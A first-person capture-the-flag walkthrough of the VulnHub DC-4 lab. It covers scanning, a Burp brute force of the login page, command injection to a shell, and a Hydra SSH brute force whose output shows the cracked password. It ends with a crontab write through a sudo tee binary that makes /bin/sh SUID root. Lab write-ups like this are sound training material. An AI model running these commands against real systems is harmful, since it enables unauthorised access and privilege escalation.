Uuuff Today got DC-4 done and some other stuff this awesome box is a little more work started with enumerating just 2 ports where ssh and HTTP are shown then we see a simple web-login page, that has no security such as not blocking even once the many login attempts that have been done, once logged in we can use the commands shown by intercepting the request with Burp and Tampering it so we can use this to get Code Execution, when this is done we will get a shell and we will need to escalate privileges twice and from here we can use the final privilege escalation to create a cronjob to run a root shell every minute, let’s get this started!!.
Initiated my arp-scan to find the box
dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo arp-scan -l Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.1.1 a4:08:f5:53:18:56 (Unknown) 192.168.1.175 00:c0:ca:96:e7:91 ALFA, INC. 192.168.1.226 08:00:27:7a:e5:4d Cadmus Computer Systems 192.168.1.169 88:de:a9:3c:5b:0d Roku, Inc. 192.168.1.245 9c:ae:d3:ed:d2:7e Seiko Epson Corporation 5 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9.5: 256 hosts scanned in 2.060 seconds (124.27 hosts/sec). 5 responded
Worked with a fast nmap scan then moved to a more targeted scan
dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap --min-rate 5000 -p- -sT 192.168.1.226 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:46 PDT Nmap scan report for dc-4 (192.168.1.226) Host is up (0.00046s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds
Then used the more detailed and targeted scan on the open ports that were found previously
dmcxblue@kali:~/Documents/vulnhub/DC4$ sudo nmap -sC -sV -p22,80 192.168.1.226 -oA nmap/DC4 Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-01 21:47 PDT Nmap scan report for dc-4 (192.168.1.226) Host is up (0.00040s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA) | 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA) |_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519) 80/tcp open http nginx 1.15.10 |_http-server-header: nginx/1.15.10 |_http-title: System Tools MAC Address: 08:00:27:7A:E5:4D (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
I decided here to move to port 80 usually SSH ports are less likely to be vulnerable this enumeration part will just give me no to little hints on what is running and if I can enumerate usernames but I will move from that and continue with port 80 when using the browser to visit the HTTP page this is presented.
Used Nikto in the background but not much to go from here:
dmcxblue@kali:~/Documents/vulnhub/DC4$ nikto -h http://192.168.1.226/ -o nikto-DC4.txt - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.226 + Target Hostname: 192.168.1.226 + Target Port: 80 + Start Time: 2019-09-01 21:51:48 (GMT-7) --------------------------------------------------------------------------- + Server: nginx/1.15.10 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Cookie PHPSESSID created without the httponly flag + 7915 requests: 0 error(s) and 4 item(s) reported on remote host + End Time: 2019-09-01 21:52:30 (GMT-7) (42 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
Gobuster found a few directories but we cannot proceed from here because we need to be logged in
dmcxblue@kali:~/Documents/vulnhub/DC4$ gobuster dir -u http://192.168.1.226/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x php -o gobuster-dc4.log =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.226/ [+] Threads: 50 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: php [+] Timeout: 10s =============================================================== 2019/09/01 21:52:14 Starting gobuster =============================================================== /login.php (Status: 302) /index.php (Status: 200) /images (Status: 301) /css (Status: 301) /logout.php (Status: 302) /command.php (Status: 302) =============================================================== 2019/09/01 21:54:45 Finished ===============================================================
After many failed attempts on guessing or sql injection, I used Burp to Brute-Force the login page as it seems nothing has been working I captured the Request and Sent it to Intruder. I set the payloads to there correct position as shown in the following Screen Shot.
Then went towards the Payloads Tab and added simple list, to cut time I know the password so just added a few keywords of it so it can be found faster.
We can see that while Burp was attacking only 1 word came back with a different length and this confirms our Login has been successful.
Once logged in.
After this we will notice 3 command options on the page by selecting the first one I decided to intercept the request with Burp to see the Raw request so I can manage it better and see if it can be tampered with.
We can see the Raw request with Burp
Sent it to repeater to tamper with and we notice that we get Code Execution
With this we can try and catch a shell we will edit the second part after the pipe line and URL encode it to receive a shell
And our shell was popped using an ncat listener with port 1234 listening
Moving on from here I noticed 3 user folders on the home directory manually viewing them ‘jim’ was interesting as it contained an old-passwords.bak file
www-data@dc-4:/home$ ls -la ls -la total 20 drwxr-xr-x 5 root root 4096 Apr 7 02:33 . drwxr-xr-x 21 root root 4096 Apr 5 20:24 .. drwxr-xr-x 2 charles charles 4096 Apr 7 04:31 charles drwxr-xr-x 3 jim jim 4096 Apr 7 04:30 jim drwxr-xr-x 2 sam sam 4096 Apr 7 04:31 sam www-data@dc-4:/home$
www-data@dc-4:/home/jim/backups$ ls -la ls -la total 12 drwxr-xr-x 2 jim jim 4096 Apr 7 02:58 . drwxr-xr-x 3 jim jim 4096 Apr 7 04:30 .. -rw-r--r-- 1 jim jim 2047 Apr 7 02:26 old-passwords.bak
Using this password list I used it to login to ssh by brute-forcing with Hydra and it cam back with a positive Result
dmcxblue@kali:~/Documents/vulnhub/DC4$ hydra 192.168.1.226 -l jim -P old-passwords.txt ssh Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-09-02 22:51:58 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task [DATA] attacking ssh://192.168.1.226:22/ [STATUS] 176.00 tries/min, 176 tries in 00:01h, 76 to do in 00:01h, 16 active [ssh] host: 192.168.1.226 login: jim password: jibril04 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-09-02 22:53:45
In JIm’s home folder he contains 3 file, 1 directory, 1 ASCII and 1 SUID we learned that the fodler was just holding the old-passwords file no need for that one the mbox file was interesting as it contained an email sent to Jim
jim@dc-4:~$ ls backups mbox test.sh jim@dc-4:~$ cat mbox From root@dc-4 Sat Apr 06 20:20:04 2019 Return-path: <root@dc-4> Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000 Received: from root by dc-4 with local (Exim 4.89) (envelope-from <root@dc-4>) id 1hCiQe-0000gc-EC for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000 To: jim@dc-4 Subject: Test MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1hCiQe-0000gc-EC@dc-4> From: root <root@dc-4> Date: Sat, 06 Apr 2019 20:20:04 +1000 Status: RO This is a test.
With this I was still looking for other things but once I remember the mail folder from ‘/var/mail’ there was another file for Jim
jim@dc-4:/var/mail$ ls jim jim@dc-4:/var/mail$ cat jim From charles@dc-4 Sat Apr 06 21:15:46 2019 Return-path: <charles@dc-4> Envelope-to: jim@dc-4 Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000 Received: from charles by dc-4 with local (Exim 4.89) (envelope-from <charles@dc-4>) id 1hCjIX-0000kO-Qt for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000 To: jim@dc-4 Subject: Holidays MIME-Version: 1.0 Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: 8bit Message-Id: <E1hCjIX-0000kO-Qt@dc-4> From: Charles <charles@dc-4> Date: Sat, 06 Apr 2019 21:15:45 +1000 Status: O Hi Jim, I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong. Password is: ^xHhA&hvim0y See ya, Charles
Look’s like an Email from Charles just sending him his own password
Used the su command and elevated to Charles
To shorten the time in Enumeration I used the LinEnum.sh Script for Privesc Enumeration and a positive results shows in our Local Scan
Let’s check this one out according to teehee we can:
charles@dc-4:~$ /usr/bin/teehee --help Usage: /usr/bin/teehee [OPTION]... [FILE]... Copy standard input to each FILE, and also to standard output. -a, --append append to the given FILEs, do not overwrite -i, --ignore-interrupts ignore interrupt signals -p diagnose errors writing to non pipes --output-error[=MODE] set behavior on write error. See MODE below --help display this help and exit --version output version information and exit MODE determines behavior with write errors on the outputs: 'warn' diagnose errors writing to any output 'warn-nopipe' diagnose errors writing to any output not a pipe 'exit' exit on error writing to any output 'exit-nopipe' exit on error writing to any output not a pipe The default MODE for the -p option is 'warn-nopipe'. The default operation when --output-error is not specified, is to exit immediately on error writing to a pipe, and diagnose errors writing to non pipe outputs. GNU coreutils online help: <http://www.gnu.org/software/coreutils/> Full documentation at: <http://www.gnu.org/software/coreutils/tee> or available locally via: info '(coreutils) tee invocation'
So this should be quite easy we can just add a cron jobs so /bin/sh executes every minute to change the permissions for the ‘/bin/sh’ to be 4777 which means SUID with this simply executing the SUID we receive a root shell.
charles@dc-4:~$ echo "* * * * * root chmod 4777 /bin/sh" |sudo /usr/bin/teehee -a /etc/crontab * * * * * root chmod 4777 /bin/sh charles@dc-4:~$ ls -al /bin/sh lrwxrwxrwx 1 root root 4 Jan 24 2017 /bin/sh -> dash charles@dc-4:~$ ls -al /bin/dash -rwsrwxrwx 1 root root 124492 Jan 24 2017 /bin/dash charles@dc-4:~$ /bin/sh # whoami root # id uid=1001(charles) gid=1001(charles) euid=0(root) groups=1001(charles) # cd /root # ls flag.txt # cat flag.txt 888 888 888 888 8888888b. 888 888 888 888 888 o 888 888 888 888 "Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888 88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " " 888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888 Congratulations!!! Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.